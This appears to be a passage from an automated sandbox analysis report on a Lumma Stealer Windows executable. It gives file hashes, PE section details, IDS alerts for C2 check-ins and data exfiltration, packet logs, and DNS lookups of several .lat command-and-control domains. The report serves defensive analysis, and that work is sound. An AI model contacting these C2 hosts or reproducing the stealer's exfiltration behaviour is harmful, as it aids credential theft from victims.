                                                                                                                                                                                                                                  z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                  GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                  • 172.67.165.185
                                                                                                                                                                                                                                  4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  P0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.165.185
                                                                                                                                                                                                                                  b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.21.66.113
                                                                                                                                                                                                                                  C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                  r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.165.185
                                                                                                                                                                                                                                  AKAMAI-ASUStFDKSN3TdH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                  ghumRvJGY9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                  i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                  Google Authenticator You're trying to sign in from a new location.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 2.19.198.51
                                                                                                                                                                                                                                  xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 23.41.55.10
                                                                                                                                                                                                                                  xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 23.64.163.184
                                                                                                                                                                                                                                  xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 23.194.143.78
                                                                                                                                                                                                                                  telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 104.116.58.253
                                                                                                                                                                                                                                  loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 184.84.140.11
                                                                                                                                                                                                                                  armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 23.64.11.148
                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                  No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.534121709908588
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: YKri2nEBWE.exe
File size: 2'920'448 bytes
MD5: 1c4c5cca8b9c930895e0e425563cf07e
SHA1: d0db3a5c54648e8480652d342dcb2526e4f9ce4d
SHA256: 36dd0a1b361b0bb7d38e1bccc954188ac2cd7d030440bbf406da3a27fb5ba098
SHA512: ef183a1158fd51485fe488f6ca15e9e420ee3912aa0cf4856b528a816e705233be1e3d21d94efddcb23478f334ad5ecfbb1e930f3efa8f1109263b258aa9191d
SSDEEP: 49152:ocflVj+cDbIdBAa1ISQRln9lXJnxZsP1Gq+uktbWMySNWz7:oYl1+cDbInAa1IBRl9x1by1Gq+3NW1z
TLSH: 57D53BD2BA4971CFD88A27788527CF426A5E03F94B2018C3A96974BB7DE3DC115F5C28
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig.............................`/...........@.........................../.....rt-...@.................................Y@..m..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x6f6000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                  or al, 80h
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add ecx, dword ptr [edx]
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  xor byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  inc eax
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [ecx], al
                                                                                                                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| | 0x1000 | 0x52000 | 0x26400 | 6a68a52c44aa8d43d9111d2390ac0041 | False | 0.9995021446078431 | data | 7.9818005594578265 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x53000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| awkvfzgs | 0x55000 | 0x2a0000 | 0x29f200 | f1feebe07c2c2aaaa399af1976eb1c7b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| nvoqryrp | 0x2f5000 | 0x1000 | 0x600 | f627e82837f64e62ecccfd72bfa283b1 | False | 0.552734375 | data | 4.916701371159365 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x2f6000 | 0x3000 | 0x2200 | 0507998ed3fa0504a22d7319a8dac258 | False | 0.08444393382352941 | DOS executable (COM) | 1.0968012805185083 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-26T13:09:22.355457+0100 | 2058514 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) | 1 | 192.168.2.5 | 62122 | 1.1.1.1 | 53 | UDP |
| 2024-12-26T13:09:22.593628+0100 | 2058502 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) | 1 | 192.168.2.5 | 49392 | 1.1.1.1 | 53 | UDP |
| 2024-12-26T13:09:22.732990+0100 | 2058492 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) | 1 | 192.168.2.5 | 63101 | 1.1.1.1 | 53 | UDP |
| 2024-12-26T13:09:22.875255+0100 | 2058500 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) | 1 | 192.168.2.5 | 62155 | 1.1.1.1 | 53 | UDP |
| 2024-12-26T13:09:23.026058+0100 | 2058510 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) | 1 | 192.168.2.5 | 55701 | 1.1.1.1 | 53 | UDP |
| 2024-12-26T13:09:23.166540+0100 | 2058484 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) | 1 | 192.168.2.5 | 50814 | 1.1.1.1 | 53 | UDP |
| 2024-12-26T13:09:23.312825+0100 | 2058512 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) | 1 | 192.168.2.5 | 56756 | 1.1.1.1 | 53 | UDP |
| 2024-12-26T13:09:23.453183+0100 | 2058480 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) | 1 | 192.168.2.5 | 57309 | 1.1.1.1 | 53 | UDP |
| 2024-12-26T13:09:25.225746+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49704 | 104.102.49.254 | 443 | TCP |
| 2024-12-26T13:09:26.082788+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.5 | 49704 | 104.102.49.254 | 443 | TCP |
| 2024-12-26T13:09:27.876648+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49705 | 172.67.157.254 | 443 | TCP |
| 2024-12-26T13:09:28.651555+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49705 | 172.67.157.254 | 443 | TCP |
| 2024-12-26T13:09:28.651555+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 172.67.157.254 | 443 | TCP |
| 2024-12-26T13:09:29.989306+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49706 | 172.67.157.254 | 443 | TCP |
| 2024-12-26T13:09:30.761854+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49706 | 172.67.157.254 | 443 | TCP |
| 2024-12-26T13:09:30.761854+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49706 | 172.67.157.254 | 443 | TCP |
| 2024-12-26T13:09:32.689522+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49707 | 172.67.157.254 | 443 | TCP |
| 2024-12-26T13:09:37.545483+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49709 | 172.67.157.254 | 443 | TCP |
| 2024-12-26T13:09:40.569369+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49717 | 172.67.157.254 | 443 | TCP |
| 2024-12-26T13:09:43.592013+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49729 | 172.67.157.254 | 443 | TCP |
| 2024-12-26T13:09:44.390705+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49729 | 172.67.157.254 | 443 | TCP |
| 2024-12-26T13:09:46.195558+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49736 | 172.67.157.254 | 443 | TCP |
| 2024-12-26T13:09:50.190424+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49747 | 172.67.157.254 | 443 | TCP |

                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.302161932 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.302177906 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.302218914 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.302234888 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.302263021 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.309663057 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.309729099 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.309765100 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.309806108 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.309823036 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.309957027 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.310003042 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.376266956 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.376300097 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.376316071 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.376322031 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.542299032 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.542355061 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.542428017 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.542743921 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.542757988 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.876523972 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.876647949 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.879828930 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.879846096 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.880166054 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.881369114 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.881398916 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.881455898 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.651554108 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.651654005 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.651710987 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.652313948 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.652334929 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.652348042 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.652354002 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.685570002 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.685614109 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.685789108 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.685975075 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.685988903 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.989038944 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.989305973 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.990609884 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.990633965 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.990869045 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.992322922 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.992350101 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.992400885 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.761881113 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.761945009 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.761980057 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.762022018 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.762027025 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.762046099 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.762067080 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.762111902 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.762155056 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.762162924 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.770139933 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.770209074 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.770217896 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.778511047 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.778578043 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.778587103 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.830944061 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.830965996 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.878014088 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.972184896 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976078033 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976120949 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976156950 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976171017 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976221085 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976227999 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976246119 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976294994 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976429939 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976444006 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976459980 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976469040 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:31.383409977 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:31.383446932 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:31.383516073 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:31.385226965 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:31.385238886 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.689419985 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.689522028 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.691363096 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.691375971 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.691641092 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.692894936 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.693114996 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.693140984 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:36.086649895 CET44349707172.67.157.254192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.026057959 CET5570153192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.164361000 CET53557011.1.1.1192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.166539907 CET5081453192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.306277037 CET53508141.1.1.1192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.312824965 CET5675653192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.450612068 CET53567561.1.1.1192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.453182936 CET5730953192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.592289925 CET53573091.1.1.1192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.594928026 CET5360853192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.733939886 CET53536081.1.1.1192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.398699999 CET5164853192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.541241884 CET53516481.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 26, 2024 13:09:22.212302923 CET | 192.168.2.5 | 1.1.1.1 | 0x8e7e | Standard query (0) | observerfry.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:22.355457067 CET | 192.168.2.5 | 1.1.1.1 | 0x3a65 | Standard query (0) | wordyfindy.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:22.593627930 CET | 192.168.2.5 | 1.1.1.1 | 0x8f0f | Standard query (0) | slipperyloo.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:22.732990026 CET | 192.168.2.5 | 1.1.1.1 | 0xafbe | Standard query (0) | manyrestro.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:22.875255108 CET | 192.168.2.5 | 1.1.1.1 | 0x3600 | Standard query (0) | shapestickyr.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:23.026057959 CET | 192.168.2.5 | 1.1.1.1 | 0x69ee | Standard query (0) | talkynicer.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:23.166539907 CET | 192.168.2.5 | 1.1.1.1 | 0xaa79 | Standard query (0) | curverpluch.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:23.312824965 CET | 192.168.2.5 | 1.1.1.1 | 0x4974 | Standard query (0) | tentabatte.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:23.453182936 CET | 192.168.2.5 | 1.1.1.1 | 0x82f6 | Standard query (0) | bashfulacid.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:23.594928026 CET | 192.168.2.5 | 1.1.1.1 | 0x3766 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:26.398699999 CET | 192.168.2.5 | 1.1.1.1 | 0xb884 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 26, 2024 13:09:22.350723028 CET | 1.1.1.1 | 192.168.2.5 | 0x8e7e | Name error (3) | observerfry.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:22.493642092 CET | 1.1.1.1 | 192.168.2.5 | 0x3a65 | Name error (3) | wordyfindy.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:22.731213093 CET | 1.1.1.1 | 192.168.2.5 | 0x8f0f | Name error (3) | slipperyloo.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:22.870779991 CET | 1.1.1.1 | 192.168.2.5 | 0xafbe | Name error (3) | manyrestro.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:23.013509989 CET | 1.1.1.1 | 192.168.2.5 | 0x3600 | Name error (3) | shapestickyr.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:23.164361000 CET | 1.1.1.1 | 192.168.2.5 | 0x69ee | Name error (3) | talkynicer.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:23.306277037 CET | 1.1.1.1 | 192.168.2.5 | 0xaa79 | Name error (3) | curverpluch.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:09:23.450612068 CET | 1.1.1.1 | 192.168.2.5 | 0x4974 | Name error (3) | tentabatte.lat | none | none | A (IP address) | IN (0x0001) | false
